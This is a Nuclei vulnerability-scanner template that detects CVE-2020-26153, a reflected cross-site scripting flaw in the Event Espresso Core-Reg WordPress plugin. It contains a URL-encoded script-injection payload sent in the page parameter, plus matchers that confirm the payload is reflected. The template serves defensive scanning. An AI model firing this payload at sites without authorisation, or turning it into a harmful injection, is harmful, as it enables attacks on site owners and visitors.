nuclei-templates/cves/2020/CVE-2020-26153.yaml

42 lines
1.4 KiB
YAML

id: CVE-2020-26153
info:
name: Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting
author: pikpikcu
severity: medium
description: |
Event Espresso Core-Reg 4.10.7.p is vulnerable to cross-site scripting in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php and allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference:
- https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/
- https://github.com/eventespresso/event-espresso-core/compare/4.10.6.p...4.10.7.p
- https://nvd.nist.gov/vuln/detail/CVE-2020-26153
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-26153
cwe-id: CWE-79
tags: cve,cve2020,xss,wordpress,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"
matchers-condition: and
matchers:
- type: word
words:
- '"/></script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 500
- type: word
part: header
words:
- text/html
# Enhanced by mp on 2022/08/15